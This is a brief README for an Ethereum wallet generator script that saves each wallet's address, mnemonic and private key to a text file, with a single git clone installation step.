mascrypt0/0xbaae099935769FD77FF21dFf915765f71BA71970/README.md

 This code generates secure Ethereum wallets with the key information needed to manage and recover them.

-The generated wallet details are stored in an array and then written to the file in a formatted manner.

-After generating all the wallets, the script saves the address, mnemonic, and private key for each wallet to wallet.txt file.
 ## Installation:
 ### First download ETH wallet Generator or clone it
 1. Clone the repository: **`git clone https://github.com/mascrypt0/0xbaae099935769FD77FF21dFf915765f71BA71970.git`**